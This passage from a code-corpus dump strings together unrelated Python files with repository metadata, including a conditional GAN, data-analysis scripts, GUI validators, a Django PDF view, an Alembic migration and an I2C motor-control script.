new_hyp = Hypothesis(
inference_state,
next_choices,
candidate.cum_score,
candidate.hyp.choice_history + [candidate.choice],
candidate.hyp.score_history + [candidate.choice_score],
)
if next_choices is None:
finished.append(new_hyp)
else:
beam.append(new_hyp)
# filter by execution
lfs = []
for hyp in finished:
_, lf = hyp.inference_state.finalize()
lfs.append(lf)
denotations = overnight.execute(lfs, orig_item.domain)
executables = []
for beam, d in zip(finished, denotations):
if d is not None:
executables.append(beam)
executables.sort(key=operator.attrgetter("score"), reverse=True)
executables = executables[:orig_beam_size]
return executables
def have_mentioned_vp(prods, mentions):
"""
Heursitics to make sure that mentioned entities and propertied are predicted
"""
if len(mentions["exact"]["property"]) > 0 and not all(
any(v in prod for prod in prods) for v in mentions["exact"]["property"]
):
em_p_flag = False
else:
em_p_flag = True
if len(mentions["exact"]["value"]) > 0 and not all(
any(v in prod for prod in prods) for v in mentions["exact"]["value"]
):
em_v_flag = False
else:
em_v_flag = True
if len(mentions["partial"]["property"]) > 0 and not all(
any(v in prod for prod in prods) for v in mentions["partial"]["property"]
):
pa_p_flag = False
else:
pa_p_flag = True
if len(mentions["partial"]["value"]) > 0 and not all(
any(v in prod for prod in prods) for v in mentions["partial"]["value"]
):
pa_v_flag = False
else:
pa_v_flag = True
# if all([em_v_flag, em_p_flag, pa_p_flag, pa_v_flag]):
if em_p_flag:
return True
else:
return False
| 3,947 |
UE4Parse/IO/IoObjects/FIoDirectoryIndexEntry.py
|
zbx911/pyUE4Parse
| 0 |
2023041
|
from UE4Parse.BinaryReader import BinaryStream
class FIoDirectoryIndexEntry:
Name: int
FirstChildEntry: int
NextSiblingEntry: int
FirstFileEntry: int
def __init__(self, reader: BinaryStream):
self.Name, self.FirstChildEntry, self.NextSiblingEntry, self.FirstFileEntry = reader.unpack2('4I', 4*4)
# self.Name = reader.readUInt32()
# self.FirstChildEntry = reader.readUInt32()
# self.NextSiblingEntry = reader.readUInt32()
# self.FirstFileEntry = reader.readUInt32()
| 529 |
voice/retrieve-info-for-a-call.py
|
arshadkazmi42/nexmo-python-quickstart
| 0 |
2023153
|
#!/usr/bin/env python3
import nexmo
from pprint import pprint
client = nexmo.Client(
application_id=APPLICATION_ID,
private_key=APPLICATION_PRIVATE_KEY_PATH,
)
# Note call can be made to current call or a completed call
response = client.get_call("NEXMO_CALL_UUID")
pprint(response)
| 293 |
im2py.py
|
CYDROM/Open-Manager
| 0 |
2023272
|
import base64
open_icon = open("Myshortcut.ico","rb")
b64str = base64.b64encode(open_icon.read())
open_icon.close()
write_data = "MYICO = '%s'\n" % b64str.decode()
f = open("icon.py","w+")
f.write(write_data)
open_icon = open("add_new.ico","rb")
b64str = base64.b64encode(open_icon.read())
open_icon.close()
write_data = "ADDICO = '%s'" % b64str.decode()
f.write(write_data)
f.close()
| 408 |
modelcobras/movement.py
|
ekadofong/mk_motormap
| 0 |
2023057
|
#!/usr/bin/env python
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
def read ( fname ):
df = pd.read_csv ( fname, names = 'x y theta phi time'.split () )
#df['x'] *= 0.06
#df['y'] *= 0.06
home = df.loc[0,'x'], df.loc[0,'y']
df['dist'] = np.sqrt((df['x'] - home[0])**2 + (df['y']-home[1])**2.)*1000.
return df
def read_convergencedata ( fname ):
rawconv = pd.read_csv ( fname, header=None )
conv = rawconv[[33,13,17,18,1,16,34,7]]
conv.columns = 'J1 J2 J1_s J2_s iter dist J1_t J2_t'.split ()
dphi = conv['J2'][1:].values - conv['J2'][:-1]
dtheta = conv['J1'][1:].values - conv['J1'][:-1]
conv['J1_stepsize'] = dtheta / conv['J1_s']
conv['J2_stepsize'] = dphi / conv['J2_s']
conv['time'] = conv.index
return conv
def read_ctrlstep ( fname, stepseq = [100.,50.], verbose=False, motor_id=2, movesize=400 ):
if motor_id == 2:
aname = 'phi'
else:
aname = 'theta'
df = read(fname)
mm = df.apply ( lambda row: 'NAN' in str(row[aname]), axis=1 )
df = df.loc[~mm].astype(float)
#print(df['phi'].astype(float))
mdf = pd.DataFrame(index=df.index[1:], columns=['xpix', 'ypix', 'startangle','d'+aname,'movesize','stepsize'])
mdf['startangle'] = df[aname][:-1]
mdf['d' + aname ] = df[aname][1:].values - df[aname][:-1]
mdf['xpix'] = df['x']
mdf['ypix'] = df['y']
mdf['move_phys'] = np.sqrt((df['x'][1:].values - df['x'][:-1])**2 + (df['y'][1:].values - df['y'][:-1])**2)*90.
mdf['iter'] = 0
mdf['stepsize'] = 0.
stake = 0
if (movesize is None):
if verbose:
print('Attempting to infer move size...')
# Need to account for when motor 1 goes from 360 -> 0
namask = np.isfinite(mdf['d'+aname])
if motor_id == 2:
if stepseq[0] > 0:
homes = mdf.loc[namask].sort_values('d' + aname).iloc[:len(stepseq)].index.sort_values()
else:
homes = mdf.loc[namask].sort_values('d' + aname).iloc[-len(stepseq):].index.sort_values()
else:
if stepseq[0] > 0:
homes = mdf.loc[namask].sort_values('d' + aname).iloc[len(stepseq):2*len(stepseq)].index.sort_values()
else:
homes = mdf.loc[namask].sort_values('d' + aname).iloc[-len(stepseq)*2:-len(stepseq)].index.sort_values()
elif movesize == 0:
mdf['iter'] = 100
mdf['movesize'] = stepseq
mdf['stepsize'] = mdf['d'+aname]/mdf['movesize']
return mdf
else:
lng = np.arange(1,1+len(stepseq))
homes = np.ones_like(stepseq)*movesize*lng + lng
for idx,cstep in enumerate(stepseq):
#nstake = mdf.iloc[stake:].query('dphi<-10.').iloc[0].name
nstake = homes[idx]
mdf.loc[mdf.index[stake:nstake],'movesize'] = cstep
mdf.loc[mdf.index[stake:nstake],'iter'] = idx
mdf.loc[mdf.index[nstake-1],'stepsize'] = np.NaN
#print(mdf.loc[mdf.index[nstake],'stepsize'])
if verbose:
print('Break @ %i' % nstake)
stake = nstake
mdf['stepsize'] = mdf['d'+aname]/mdf['movesize']
mdf.loc[mdf.index[homes-1], 'stepsize'] = np.NaN
return mdf
def estimate_std ( mdf ):
angle_grid = np.arange(0,180.,6.)
assns = np.digitize ( mdf['startangle'], angle_grid )
stds = mdf.stepsize.groupby(assns).std()
stds = stds.replace ( np.NaN, 100.)
mdf['u_stepsize'] = stds.loc[assns].values
return mdf
def read_mdf ( fname ):
df = read(fname)
mdf = pd.DataFrame(index=df.index[1:], columns=['xpix','ypix','startangle','dphi','movesize','stepsize'])
mdf['startangle'] = df['phi'][:-1]
mdf['movesize'] = 0.
#mdf['movesize'] = 15.*(1.-mdf.index%2) -5.*(mdf.index%2)
mdf['xpix'] = df['x']
mdf['ypix'] = df['y']
mdf['dphi'] = df['phi'][1:].values - df['phi'][:-1]
mdf.loc[mdf['dphi']>0, 'movesize'] = 15.
mdf.loc[mdf['dphi']<0, 'movesize'] = -5.
#mdf.loc[mdf.index[::2],'movesize'] = 15.
#mdf.loc[mdf.index[1::2],'movesize'] = -5.
mdf['stepsize'] = mdf['dphi']/mdf['movesize']
mdf['is_fwd'] = np.sign(mdf['movesize']) > 0
return mdf
def plot ( df, axarr, cmap='PiYG', lbl=None ):
axarr[0].scatter ( df['x'], df['y'], s=9, c=df.index % 2,
cmap=cmap, alpha=0.8, label=lbl)
axarr[0].set_aspect('equal','datalim' )
axarr[1].scatter ( df.index, df['dist'], s=18, c=df.index % 2,
cmap=cmap, alpha=0.8 )
[ axarr[i].grid(alpha=0.4) for i in range(2) ]
axarr[0].set_xlabel ( 'x (mm)' )
axarr[0].set_ylabel ( 'y (mm)' )
axarr[1].set_xlabel ( 'time (step #)')
axarr[1].set_ylabel ( r'distance from start ($\mu$m)')
plt.tight_layout ()
return axarr
def run ( ):
dirnames = ['18_04_25_10_11_47_erin_test/',
'18_04_25_11_12_44_erin_test/',
'18_04_25_12_26_06_erin_test/']
cmaps=['PiYG','RdBu','PuOr_r']
labels=['Run 1','Run 2','Run 3']
for pid in range(1,57):
fig,axarr = plt.subplots(1,2,figsize=(10,4))
for i,cdir in enumerate(dirnames):
fname = './%s/Log/PhiSpecMove_mId_1_pId_%i.txt' % (cdir,pid)
df = read(fname)
plot ( df, axarr, cmaps[i] )
plt.savefig('./timevol_pid%i.png'%pid)
plt.close ()
def clean_map(ctrlstep):
ctrlstep = ctrlstep.convert_objects ()
#// filter ctrlstep based on Johannes' suggestions
lowthresh = 0.01
ctrlstep.loc[ctrlstep['stepsize'] < 0, 'stepsize'] = np.nan
ctrlstep.loc[ctrlstep['stepsize'] > 1., 'stepsize'] = np.nan
bins = np.arange ( 0., 400., 10. )
assns = np.digitize ( ctrlstep['startangle'], bins )
grps = ctrlstep.groupby ( assns )
ssmean = grps.mean()['stepsize']
sscount = grps.count()['stepsize']
#// cut on mean change or overpopulation
deltam = abs(ssmean-ssmean.mean()) > 3.*ssmean.std()
deltact = abs(sscount-sscount.mean()) > 3.*sscount.std()
to_cut = ssmean.index[deltam|deltact]
ctrlstep.loc[np.in1d(assns, to_cut),'stepsize'] = np.NaN
mm = np.isfinite(ctrlstep).all(axis=1)
return ctrlstep.loc[mm]
def read_tso ( specdir, pid, niter=3 ):
po = read_ctrlstep ( specdir + '/PhiSpecMove_mId_1_pId_%i.txt'%pid,
movesize=None)
if not po.iloc[niter]['startangle'] < po.iloc[0]['startangle']:
#// check to make sure that the motor got all the way back home.
#// If not, discard
print ("PID %i did not make it home! :(" % pid )
return None
benchmarks = po.iloc[:niter+1]['startangle'].sort_values ()
diff = benchmarks.diff ()/2
po['movestate'] = np.nan
po.loc[:niter,'movestate'] = range(1,niter+1)
po.loc[niter+1,'movestate'] = 0
for idx in po.index:
bench = po.groupby('movestate').apply ( lambda x: x.iloc[-1] )
po.loc[idx,'movestate'] = abs(po.loc[idx,'startangle'] - bench['startangle']).argmin()
return po
| 7,122 |
app/gui/utils.py
|
ammar369/RM-Automation-Py
| 0 |
2023808
|
import os
from pathlib import Path
from PIL import ImageTk, Image
from app.utils import form_logger
from app.rmbot.config import TODAY_DDMMYYYY
from app.gui.config import (
VALID_EXTENSIONS,
VALID_UPPERCASE,
VALID_NUMBER,
IMAGE_WIDTH,
IMAGE_HEIGHT,
MAX_DEPRECIATION,
VALID_INTIMATION_PREFIX,
LOCATION_OPTIONS,
)
gui_logger = form_logger("guiLogger")
rm_logger = form_logger("rmLogger")
def correct_loss_no(value: str):
if len(value) == 13:
year_no = value[-2:]
final_value = value[0:10] + r"/20" + year_no
rm_logger.debug(
f"""fixed loss no: {value} -> {final_value}
"""
)
else:
final_value = value
return final_value
def correct_empty_text(value: str):
if value is None:
fixed_value = " "
else:
fixed_value = value
return fixed_value
def correct_netpayable(value: str):
if value is None or value == "0" or value == "":
value = "1"
new_value = float_to_int(value=value)
return new_value
def correct_empty_number(value):
if value is None or value == "":
fixed_value = "1"
else:
fixed_value = value
return fixed_value
def float_to_int(value: str):
reformed_value = correct_empty_number(value=value)
new_value1 = reformed_value.replace(",", "")
new_value2 = new_value1.replace(" ", "")
return int(float(new_value2))
def correct_speedometer(value: str):
new_value = ""
for char in value:
if char in VALID_NUMBER:
new_value += char
return float_to_int(value=new_value)
def validate_date(date_string):
for char in date_string:
if char in VALID_UPPERCASE:
return (False, TODAY_DDMMYYYY)
return (True, date_string)
def check_intimation(intimation_no: str):
if len(intimation_no) == 9:
intimationFlag = (
(intimation_no.find("/", 6, 7) == -1)
| (intimation_no[0] not in VALID_INTIMATION_PREFIX[0:6])
| (intimation_no[1] not in VALID_NUMBER)
| (intimation_no[2] not in VALID_NUMBER)
| (intimation_no[3] not in VALID_NUMBER)
| (intimation_no[4] not in VALID_NUMBER)
| (intimation_no[5] not in VALID_NUMBER)
| (intimation_no[7] not in VALID_NUMBER)
| (intimation_no[8] not in VALID_NUMBER)
)
gui_logger.debug(f"Intimation flag raised: {intimationFlag}")
return intimationFlag
elif len(intimation_no) == 10:
intimationFlag = (
(intimation_no.find("/", 7, 8) == -1)
| (intimation_no[0:2] != VALID_INTIMATION_PREFIX[6])
| (intimation_no[2] not in VALID_NUMBER)
| (intimation_no[3] not in VALID_NUMBER)
| (intimation_no[4] not in VALID_NUMBER)
| (intimation_no[5] not in VALID_NUMBER)
| (intimation_no[6] not in VALID_NUMBER)
| (intimation_no[8] not in VALID_NUMBER)
| (intimation_no[9] not in VALID_NUMBER)
)
gui_logger.debug(f"Intimation flag raised: {intimationFlag}")
return intimationFlag
else:
gui_logger.debug(f"Intimation flag raised: {True}")
return True
def check_survey_conductor(survey_conductor: str):
surveyConductorFlag = (len(survey_conductor) < 1) | (
any(x in survey_conductor for x in VALID_NUMBER)
)
gui_logger.debug(f"Survey conductor flag raised: {surveyConductorFlag}")
return surveyConductorFlag
def check_workshop_name(workshop_name: str):
workshopFlag = len(workshop_name) < 6
gui_logger.debug(f"Workshop name flag raised: {workshopFlag}")
return workshopFlag
def check_workshop_contact(workshop_contact: str):
contactFlag = (len(workshop_contact) < 4) | (
any(x in workshop_contact for x in VALID_NUMBER)
)
gui_logger.debug(f"Workshop contact flag raised: {contactFlag}")
return contactFlag
def check_directory(image_folder_path: str):
valid_files = get_image_names(image_folder_path)
# gui_logger.debug(f"Image list: {valid_files}")
gui_logger.debug(f"Number of images found: {len(valid_files)}")
if len(valid_files) >= 1:
gui_logger.debug("Image folder flag raised: False")
return False
else:
gui_logger.debug("Image folder flag raised: True")
return True
def check_depreciation(depreciation: str, max_depreciation=MAX_DEPRECIATION):
try:
if depreciation is None or depreciation == "":
depreciation = 0
depreciationFlag = int(depreciation) > max_depreciation
except ValueError:
depreciationFlag = True
finally:
gui_logger.debug(f"Depreciation flag raised: {depreciationFlag}")
return depreciationFlag
def check_location(location):
if location not in LOCATION_OPTIONS:
return True
else:
return False
def get_image_names(folder_path):
directoryExistsFlag = os.path.exists(folder_path)
if directoryExistsFlag:
valid_images = [
name
for name in os.listdir(Path(folder_path))
if os.path.isfile(Path(folder_path) / name)
and Path(Path(folder_path) / name).suffix in VALID_EXTENSIONS
]
else:
gui_logger.error("IMAGE FOLDER DOES NOT EXIST")
valid_images = []
return valid_images
def get_image_paths(folder_path):
image_list = []
image_names = get_image_names(folder_path)
if len(image_names) >= 1:
for image_name in image_names:
image_path = folder_path + "/" + image_name
image_list.append(image_path)
else:
gui_logger.error("VALID IMAGES NOT FOUND")
return image_list
def initialize_image(image_path=None, width=IMAGE_WIDTH, height=IMAGE_HEIGHT):
rawImage = Image.open(image_path)
resizedImage = rawImage.resize((width, height))
image = ImageTk.PhotoImage(resizedImage)
return image
| 5,950 |
scripts/parse_old_annotations.py
|
gokhankici/iodine
| 9 |
2023546
|
#!/usr/bin/env python3
import collections
import json
import sys
import re
sources = set()
sinks = set()
initial_eq = set()
always_eq = set()
assert_eq = set()
initial_eq_mod = collections.defaultdict(set)
qualif_implies = set()
qualif_pairs = set()
def update_annots(typ, val):
val = val.replace(" ", "")
if typ == "taint_source":
sources.add(val)
elif typ == "taint_sink":
sinks.add(val)
elif typ == "sanitize":
initial_eq.update(val.split(","))
elif typ == "sanitize_mod":
[m,v] = val.split(",")
initial_eq_mod[m].add(v)
elif typ == "sanitize_glob":
always_eq.add(val)
elif typ == "assert_eq":
assert_eq.add(val)
elif typ == "qualifierImp":
m = re.match("(.*),\[(.*)\]", val)
lhs = m.group(1)
rhs = m.group(2).split(",")
qualif_implies.add((lhs, frozenset(rhs)))
elif typ == "qualifierPairs":
vs = val[1:-1].split(",") # remove the surrounding brackets
qualif_pairs.add(frozenset(vs))
else:
print("Unknown annotation: @annot{{{}({})}}".format(typ, val),
file=sys.stderr)
with open(sys.argv[1], "r") as f:
for l in f:
l = l.strip()
for result in re.finditer("//\s*@annot{(.+)\((.+)\)}", l):
t = result.group(1)
a = result.group(2)
update_annots(t, a)
result = collections.defaultdict(list)
def go_annot(var_set, type_name, module=None):
if len(var_set) > 0:
r = {"type": type_name, "variables": list(sorted(var_set))}
if module is not None:
r["module"] = module
result["annotations"].append(r)
go_annot(sources, "source")
go_annot(sinks, "sink")
go_annot(assert_eq, "assert_eq")
go_annot(always_eq, "always_eq")
go_annot(initial_eq, "initial_eq")
for m in initial_eq_mod:
go_annot(initial_eq_mod[m], "initial_eq", module=m)
for lhs, rhs in qualif_implies:
result["qualifiers"].append({"type": "implies", "lhs": lhs, "rhs": list(rhs)})
for vs in qualif_pairs:
result["qualifiers"].append({"type": "pairs", "variables": list(vs)})
print(json.dumps(result, indent=2))
| 2,175 |
tamr_client/_beta.py
|
ianbakst/tamr-client
| 9 |
2023307
|
import os
import sys
def check():
env_var = "TAMR_CLIENT_BETA"
is_beta_enabled = os.environ.get(env_var) == "1"
if not is_beta_enabled:
msg = (
f"ERROR: 'tamr_client' package is in BETA, but you do not have the '{env_var}' environment variable set to '1'."
"\n\nHINT: For non-BETA features, use only the 'tamr_unify_client' package."
f"\nHINT: To opt-in to BETA features, set environment variable: '{env_var}=1'."
"\n\nWARNING: Do not rely on BETA features in production workflows."
" Support from Tamr may be limited."
)
print(msg)
sys.exit(1)
| 652 |
src/test_insertion_sort.py
|
thejohnjensen/data_structures_2
| 0 |
2023620
|
"""."""
from insertion_sort import insertion
from random import randint
import pytest
def test_insertion():
"""Test with random list."""
unsorted = [randint(0, 1000000) for i in range(1000)]
assert insertion(unsorted) == sorted(unsorted)
def test_insertion_worse_case():
"""Test with reversed list."""
reverse = [i for i in range(1000)]
reverse.reverse()
assert insertion(reverse) == sorted(reverse)
def test_insertion_passed_a_string():
"""Test that raises error."""
with pytest.raises(TypeError):
assert insertion('hello')
def test_insertion_empty_list():
"""Test that properly handles an empty list."""
assert insertion([]) == []
def test_insertion_in_order():
"""Test doesn't mess with my list when in order."""
in_order = [i for i in range(1000)]
assert insertion(in_order) == in_order
| 864 |
dffml/util/tempdir.py
|
sauravsrijan/dffml
| 0 |
2023429
|
# SPDX-License-Identifier: MIT
# Copyright (c) 2019 Intel Corporation
"""
Create and remove OS temporary directories.
"""
import queue
import shutil
import os.path
import tempfile
from typing import List
from .log import LOGGER
LOGGER = LOGGER.getChild("tempdir")
class TempDir(object):
"""
Creates and deletes temporary directories. Removes any created directories
when the program using this class terminates (see rmtempdirs for details).
"""
SUFFIX: str = None
PREFIX: str = "dffml_"
def __init__(self):
self.suffix = self.__class__.SUFFIX
self.prefix = self.__class__.PREFIX
self.dirs: List[str] = []
def mktempdir(self):
"""
Creates a temporary directory using TempDir's SUFFIX and PREFIX.
Adds the directory to the to be deleted queue.
"""
dirname = tempfile.mkdtemp(suffix=self.suffix, prefix=self.prefix)
LOGGER.debug("Created directory %r", dirname)
self.dirs.append(dirname)
return dirname
def rmtempdirs(self):
"""
Removes all created temporary directories. Decorated with the
atexit.register method to ensure all created directories will be removed
on termination.
"""
for rmdir in self.dirs:
LOGGER.debug("Removing directory %r", rmdir)
# OSError 39 sometimes if removal isn't attempted twice
shutil.rmtree(rmdir, ignore_errors=True)
shutil.rmtree(rmdir, ignore_errors=True)
async def __aenter__(self):
pass
async def __aexit__(self, exc_type, exc_value, traceback):
self.rmtempdirs()
| 1,652 |
CGAN/cgan_conv_concat.py
|
yangliuav/all-GAN-in-Keras
| 0 |
2023347
|
from __future__ import print_function, division
from keras.datasets import cifar10
from keras.layers import Input, Dense, Reshape, Flatten, Dropout, multiply, Concatenate
from keras.layers import BatchNormalization, Activation, ZeroPadding2D, Embedding
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.convolutional import UpSampling2D, Conv2D
from keras.models import Sequential, Model
from keras.optimizers import Adam
import matplotlib.pyplot as plt
import sys
import numpy as np
import os
from keras.utils import multi_gpu_model
sys.path.append( os.path.join(os.getcwd(), 'utils'))
import tools as t
multi_gpu = False
class CGAN():
def __init__(self):
# Input shape
self.img_rows = 32
self.img_cols = 32
self.channels = 3
self.img_shape = (self.img_rows, self.img_cols, self.channels)
self.latent_dim = 200
self.num_classes = 10
optimizer = Adam(0.0002, 0.5)
# Build and compile the discriminator
self.discriminator = self.build_discriminator()
if multi_gpu == True:
self.discriminator = multi_gpu_model(self.discriminator)
self.discriminator.compile(loss='binary_crossentropy',
optimizer=optimizer,
metrics=['accuracy'])
# Build the generator
self.generator = self.build_generator()
# The generator takes noise as input and generates imgs
noise = Input(shape=(self.latent_dim,))
label = Input(shape=(1,))
img = self.generator([noise, label])
# For the combined model we will only train the generator
self.discriminator.trainable = False
# The discriminator takes generated image as input and determines validity
# and the label of that image
valid = self.discriminator([img, label])
# The combined model (stacked generator and discriminator)
# Trains generator to fool discriminator
self.combined = Model([noise, label], valid)
if multi_gpu == True:
self.combined = multi_gpu_model(self.combined )
self.combined.compile(loss=['binary_crossentropy'], optimizer=optimizer)
def build_generator(self):
noise = Input(shape=(self.latent_dim,))
x1 = Dense(128 * 8 * 8, activation="relu", input_dim=self.latent_dim)(noise)
x1 = Reshape((8, 8, 128))(x1)
label = Input(shape=(1,), dtype='int32')
label_embedding = Flatten()(Embedding(self.num_classes, 8 * 8)(label))
x2 = Dense(8 * 8, activation="relu")(label_embedding)
x2 = Reshape((8, 8, 1))(x2)
x = Concatenate()([x1,x2])
x = LeakyReLU(alpha=0.2)(x)
x = BatchNormalization(momentum=0.8)(x)
x = UpSampling2D()(x) # Conv2DTranspose
x = Conv2D(128, kernel_size=3, padding="same")(x)
x = LeakyReLU(alpha=0.2)(x)
x = BatchNormalization(momentum=0.8)(x)
x = UpSampling2D()(x)
x = Conv2D(64, kernel_size=3, padding="same")(x)
x = LeakyReLU(alpha=0.2)(x)
x = BatchNormalization(momentum=0.8)(x)
x = Conv2D(self.channels, kernel_size=3, padding="same")(x)
img = Activation("tanh")(x)
return Model([noise, label], img)
def build_discriminator(self):
img = Input(shape=self.img_shape)
label = Input(shape=(1,), dtype='int32')
label_embedding = Flatten()(Embedding(self.num_classes, 32 * 32 * 3)(label))
x2 = Dense(32 * 32 * 3, activation="relu")(label_embedding)
x2 = Reshape((32, 32, 3))(x2)
x = Concatenate()([img,x2])
x = Conv2D(32, kernel_size=3, strides=2, input_shape=self.img_shape, padding="same")(x)
x = LeakyReLU(alpha=0.2)(x)
x = Dropout(0.25)(x) # 0.5
x = Conv2D(64, kernel_size=3, strides=2, padding="same")(x)
x = ZeroPadding2D(padding=((0,1),(0,1)))(x)
x = BatchNormalization(momentum=0.8)(x)
x = LeakyReLU(alpha=0.2)(x)
x = Dropout(0.25)(x)
x = Conv2D(128, kernel_size=3, strides=2, padding="same")(x)
x = BatchNormalization(momentum=0.8)(x)
x = LeakyReLU(alpha=0.2)(x)
x = Dropout(0.25)(x)
x = Conv2D(256, kernel_size=3, strides=1, padding="same")(x)
x = BatchNormalization(momentum=0.8)(x)
x = LeakyReLU(alpha=0.2)(x)
x = Dropout(0.25)(x)
x = Flatten()(x)
x = Dense(1, activation='sigmoid')(x)
#model.summary()
return Model([img, label], x)
def train(self, epochs, batch_size=128, sample_interval=50):
# Load the dataset
(x_train, y_train), (_, _) = cifar10.load_data()
# Configure input
x_train = (x_train.astype(np.float32) - 127.5) / 127.5
y_train = y_train.reshape(-1, 1)
# Adversarial ground truths
valid = np.ones((batch_size, 1))
fake = np.zeros((batch_size, 1))
for epoch in range(epochs):
# ---------------------
# Train Discriminator
# ---------------------
# Select a random half batch of images
idx = np.asarray(range(x_train.shape[0]))
np.random.shuffle(idx)
for i in range(int(x_train.shape[0]/batch_size)):
sub_idx = idx[i*batch_size:(i+1)*batch_size]
imgs, labels = x_train[sub_idx], y_train[sub_idx]
# Sample noise as generator input
noise = np.random.normal(0, 1, (batch_size, self.latent_dim))
# Generate a half batch of new images
gen_imgs = self.generator.predict([noise, labels])
# Train the discriminator
d_loss_real = self.discriminator.train_on_batch([imgs, labels], valid)
d_loss_fake = self.discriminator.train_on_batch([gen_imgs, labels], fake)
d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
# ---------------------
# Train Generator
# ---------------------
# Condition on labels
sampled_labels = np.random.randint(0, 10, batch_size).reshape(-1, 1)
# Train the generator
g_loss = self.combined.train_on_batch([noise, sampled_labels], valid)
# Plot the progress
print ("%d [D loss: %f, acc.: %.2f%%] [G loss: %f]" % (epoch, d_loss[0], 100*d_loss[1], g_loss))
# If at save interval => save generated image samples
if epoch % sample_interval == 0:
self.sample_images(epoch)
def sample_images(self, epoch):
r, c = 2, 5
noise = np.random.normal(0, 1, (r * c, self.latent_dim))
sampled_labels = np.arange(0, 10).reshape(-1, 1)
gen_imgs = self.generator.predict([noise, sampled_labels])
# Rescale images 0 - 1
gen_imgs = 0.5 * gen_imgs + 0.5
fig, axs = plt.subplots(r, c)
cnt = 0
for i in range(r):
for j in range(c):
axs[i,j].imshow(gen_imgs[cnt, :,:, :])
axs[i,j].title.set_text(t.categories[cnt])
axs[i,j].axis('off')
cnt += 1
fig.suptitle('epochs = '+ str(epoch))
fig.savefig( os.path.join(os.getcwd(), 'CGAN', 'images', "cifar10_%d_%d.png" % (self.latent_dim, epoch)) )
plt.close()
if __name__ == '__main__':
cgan = CGAN()
if multi_gpu == True:
cgan.train(epochs=101, batch_size=32*8, sample_interval=10)
else:
cgan.train(epochs=101, batch_size=32, sample_interval=10)
| 7,624 |
migrations/versions/1c172052d272_created_table_tasks.py
|
thainaferreira/matriz-de-eisenhower
| 0 |
2022798
|
"""Created table Tasks
Revision ID: 1c172052d272
Revises: 9bc65293e9cc
Create Date: 2021-10-05 00:37:41.299386
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = '9bc65293e9cc'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('tasks',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=100), nullable=False),
sa.Column('description', sa.Text(), nullable=True),
sa.Column('duration', sa.Integer(), nullable=True),
sa.Column('importance', sa.Integer(), nullable=True),
sa.Column('urgency', sa.Integer(), nullable=True),
sa.Column('eisenhower_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['eisenhower_id'], ['eisenhowers.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('tasks')
# ### end Alembic commands ###
| 1,133 |
pdf/views.py
|
spalk/Plant-Passport-gitpod
| 0 |
2023229
|
from django.shortcuts import render
from django.http import HttpResponse, Http404, HttpResponseForbidden
from django.contrib.auth.decorators import login_required
from plants.models import Plant
from plants.entities import RichPlant
from plants.services import check_is_user_owner_of_plant
from .services import LabelsBuilder
@login_required
def get_labels_pdf(request):
"""Returns PDF file with Labels for requested Plants"""
# processing user data
if request.method == 'POST':
if request.POST['plant_ids']:
# get rich plants
plant_ids = request.POST.getlist('plant_ids')
plants = Plant.objects.filter(id__in=plant_ids)
rich_plants = []
for plant in plants:
rich_plants.append(RichPlant(plant))
# check access (is owner) for all plants
current_user = request.user
for rich_plant in rich_plants:
user_is_owner = check_is_user_owner_of_plant(current_user, rich_plant)
if not user_is_owner:
return HttpResponseForbidden()
# generate and return pdf
labels = LabelsBuilder(rich_plants, current_user)
labels.generate_labels()
path_to_pdf = labels.get_pdf()
if path_to_pdf:
pdf_file = open(path_to_pdf, 'rb')
response = HttpResponse(content=pdf_file)
response['Content-Type'] = 'application/pdf'
response['Content-Disposition'] = f'attachment; filename="{current_user.username}_labels.pdf"'
return response
else:
return Http404("No plants was received")
else:
return HttpResponseForbidden()
| 1,762 |
flightControl/Python/i2cesc.py
|
robertIanClarkson/Air-Pixel
| 0 |
2023656
|
import smbus
import time
ESC_ADDR = 0x29
THROTTLE_ADDR_L = 0x00
THROTTLE_ADDR_H = 0X01
arm = 0x00
start = 0x0A
stop = 0x00
bus = smbus.SMBus(1)
bus.write_byte_data(ESC_ADDR, THROTTLE_ADDR_L, arm)
bus.write_byte_data(ESC_ADDR, THROTTLE_ADDR_H, arm)
time.sleep(1)
bus.write_byte_data(ESC_ADDR, THROTTLE_ADDR_L, start)
bus.write_byte_data(ESC_ADDR, THROTTLE_ADDR_H, start)
time.sleep(2)
bus.write_byte_data(ESC_ADDR, THROTTLE_ADDR_L, stop)
bus.write_byte_data(ESC_ADDR, THROTTLE_ADDR_H, stop)
| 525 |
generate_graphs/generate_example.py
|
QuentinDeHaes/Unboundedness-for-1-VASS
| 0 |
2023796
|
from graph import Graph
from Node import Node, NodeCreator
def generate_example():
"""
generates the example graph from the paper
:return: the example graph
"""
s0 = Node(0)
s1 = Node(1)
s2 = Node(2)
s3 = Node(3)
s4 = Node(4)
s5 = Node(5)
s6 = Node(6)
s7 = Node(7)
s8 = Node(8)
s9 = Node(9)
s10 = Node(10)
s11 = Node(11)
s12 = Node(12)
s13 = Node(13)
s0.add_edge(s1, 12)
s1.add_edge(s2, -12)
s2.add_edge(s1, 18)
s1.add_edge(s3, 12)
s3.add_edge(s4, 30)
s4.add_edge(s5, -52)
s5.add_edge(s6, 52)
s6.add_edge(s4, 9)
s4.add_edge(s7, 4)
s7.add_edge(s8, 4)
s8.add_edge(s9, -3)
s9.add_edge(s10, 17)
s10.add_edge(s11, -80)
s11.add_edge(s12, 81)
s12.add_edge(s13, 3)
s13.add_edge(s10, 6)
s1.add_disequality(60)
s3.add_disequality(30)
s4.add_disequality(90)
s5.add_disequality(41)
s6.add_disequality(96)
s7.add_disequality(70)
s8.add_disequality(80)
s9.add_disequality(80)
s10.add_disequality(120)
s11.add_disequality(43)
s12.add_disequality(130)
s13.add_disequality(130)
g = Graph(s0)
g.set_nodes([s0, s1, s2, s3, s4, s5, s6, s7, s8, s9, s10, s11, s12, s13])
return g
| 1,260 |
tests/test_slow_RB.py
|
snek5000/snek5000-cbox
| 0 |
2023699
|
from shutil import rmtree
import pytest
import numpy as np
from snek5000 import load
from snek5000_cbox.solver import Simul
@pytest.mark.slow
def params_RB():
params = Simul.create_default_params()
